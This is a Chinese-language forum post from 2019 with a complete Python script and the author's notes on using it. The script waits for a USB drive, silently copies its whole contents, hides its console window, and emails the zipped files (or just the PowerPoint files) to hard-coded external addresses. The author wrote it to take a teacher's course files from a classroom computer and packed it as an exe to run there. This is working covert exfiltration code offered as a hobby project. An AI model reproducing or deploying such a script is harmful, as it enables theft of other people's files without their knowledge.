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本帖最后由 watermelon 于 2019-5-8 23:36 编辑
1.首先主要功能是识别U盘插入并且对U盘中的文件进行拷贝:我对于识别U盘的是否插入处理的比较简单,一般电脑都是有3个盘(C: D: E:),那么U盘插入到电脑上的时候就会成为F盘。我用一个死循环+break来使程序一直运行下去,在运行的过程中一直用os.path.exists('F:')方法对电脑进行查询是否有F盘。如果有F盘,则说明U盘已经插入,进行后续的处理;否则表示U盘还没有插入,这个时候程序一直循环下去。由于是死循环,为了防止CPU使用率过高,适当的利用sleep函数是有必要的,并且我还根据CPU不同的使用率来适当调整sleep的时间,当CPU使用率小于25%时候,sleep0.5秒,高于25%时候睡眠1秒。拷贝U盘里的全部文件就用到了shutil.copytree方法,这个使用起来非常方便!
3.网易邮箱发送邮件附件有一个限制,就是附件大小好像不能够大于20MB(163邮箱说的最大附件可以到3G,难道是因为我没有充钱的缘故?),所以当我第一次发送打包的邮件时候写上try except,如果发送不了,就对已经从U盘中拷贝下来所有的文件中筛选文件后缀名称是.ppt和.pptx的文件,如果该后缀名结尾的文件大小大于15MB的就不要了,把剩下的所有挑选下来的PPT打成压缩包进行附件的发送,此时就有比较大的几率发送成功了,但是如果还是发送不成功就给用户发送一封致歉信并且说明让用户下课在老师走后去电脑上用U盘拷贝下课件。
- #!/usr/bin/python
- # -*- coding: UTF-8 -*-
- import os
- import os.path
- import shutil
- from time import sleep
- from email.header import Header
- from email.mime.text import MIMEText
- from email.mime.base import MIMEBase
- from email.mime.multipart import MIMEMultipart
- from email import encoders
- from email.utils import parseaddr, formataddr
- import smtplib
- import psutil
- import uuid
- import ctypes
- # Copy files and zip them.
- def copy_zip():
- # Use the UUID to name a folder.
- filename = str(uuid.uuid1())
- while True:
- if os.path.exists('F:'):
- print('USB disk has been detected.')
- try:
- shutil.copytree('F:','D:\\'+filename)
- print("Files have been copied successfully.")
- break
- except Exception:
- print('Error in copy_zip function, this circle will be exited')
- break
- else:
- print("Can't detect a USB disk on the PC now")
- # if the usage of CPU is higher than 25%, sleep 1 seconds.
- if psutil.cpu_percent() <= 25:
- sleep(0.5) # Sleep 0.5 seconds
- else:
- sleep(1) # Sleep 1 seconds
- print('Continue searching...')
- # Build the ZIP file
- shutil.make_archive(r'D:\email','zip','D:\\',filename)
- print('ZIP file is ready.')
- return 'D:\\' + filename
- # if the size of zip is too large to email, choose the PowerPoint files to email.
- def get_ppt(filepath):
- os.chdir(filepath)
- target = ['.ppt', '.pptx']
- for each_file in os.listdir(os.curdir):
- extension = os.path.splitext(each_file)[1]
- # If single file size larger than 15MB, pass.
- if (not os.path.isdir(each_file)) and os.path.getsize(each_file)/(1024*1024) >= 15:
- continue
- if extension in target:
- try:
- shutil.copy(os.path.abspath(each_file), 'D:\\PPTtarget')
- except:
- pass
- if os.path.isdir(each_file):
- get_ppt(each_file)
- os.chdir(os.pardir)
- shutil.make_archive(r'D:\PPT', 'zip', 'D:\\','PPTtarget')
- # Sending Email with Attachments.
- def send_file(attachfile_path):
- sender = 'starlight_chou@163.com'
- access_code = '*********'
- receiver = ['2015572934@qq.com', '1483551760@qq.com']
- smtpserver = 'smtp.163.com'
- subject = 'Python coding is passion coding, yeah!'
- msg = MIMEMultipart()
- msg['Subject'] = Header(subject, 'utf-8')
- msg['From'] = sender
- msg['To'] = ','.join(receiver)
- # Add Attachment files to the Email.
- with open(attachfile_path,'rb') as f:
- mime = MIMEBase('zipfile', 'zip', filename = 'HDZXKJ.zip')
- mime.add_header('Content-Disposition', 'attachment', filename = 'HDZXKJ.zip')
- mime.add_header('Content-ID','<0>')
- mime.add_header('X-Attachment-Id', '0')
- mime.set_payload(f.read())
- encoders.encode_base64(mime)
- msg.attach(mime)
- try:
- smtp = smtplib.SMTP()
- smtp.connect(smtpserver)
- smtp.login(sender,access_code)
- smtp.sendmail(sender,msg['To'].split(','),msg.as_string())
- smtp.quit()
- print("Email has sent successfully!")
- return True
- except:
- print('Error in send_file function')
- return False
- # Because of the attachment size is larger than 20MB that
- # can't have a transform through the 163.com.
- # So send a sorry to user and let him copy the file with the USB disk.
- def send_sorry():
- sender = 'starlight_chou@163.com'
- access_code = '*********'
- receiver = ['2015572934@qq.com', '3207299524@qq.com']
- smtpserver = 'smtp.163.com'
- subject = 'Python coding is passion coding, yeah!'
- msg = MIMEText('So sorry that the file is too large to email, please copy the zip folder with your USB disk','plain','utf-8')
- msg['Subject'] = Header(subject, 'utf-8')
- msg['From'] = sender
- msg['To'] = ','.join(receiver)
- try:
- smtp = smtplib.SMTP()
- smtp.connect(smtpserver)
- smtp.login(sender,access_code)
- smtp.sendmail(sender,msg['To'].split(','),msg.as_string())
- smtp.quit()
- print('success')
- except:
- pass
- if __name__ == '__main__':
- print("Let's Begin!")
- sleep(2)
- # Hide the running console.
- h_console = ctypes.windll.kernel32.GetConsoleWindow()
- if h_console != 0:
- ctypes.windll.user32.ShowWindow(h_console,0)
- # Begin!
- filepath = copy_zip()
- if send_file('D:\\email.zip') == True:
- print('Done!')
- else:
- print("ERROR, Maybe the size of ZIP is too large to email")
- print("Please use the USB disk to copy the files")
- print("Now try to only email the PPT files in the folder")
- get_ppt(filepath)
- sleep(2)
- if send_file('D:\\PPT.zip') == False:
- send_sorry()
- print('Good Bye')
- # Release the handle of Console.
- ctypes.windll.kernel32.CloseHandle(h_console)
当晚写好了程序,用pyinstaller3.4打包成exe(包含很多库文件)在我的win10(装有Python3.7)和win7 x64虚拟机上试运行都完美运行,很是满足睡觉,但是第二天去课上给电脑运行却出现了没有办法运行的情况!
《Python可以这样学》 董付国 清华大学出版社
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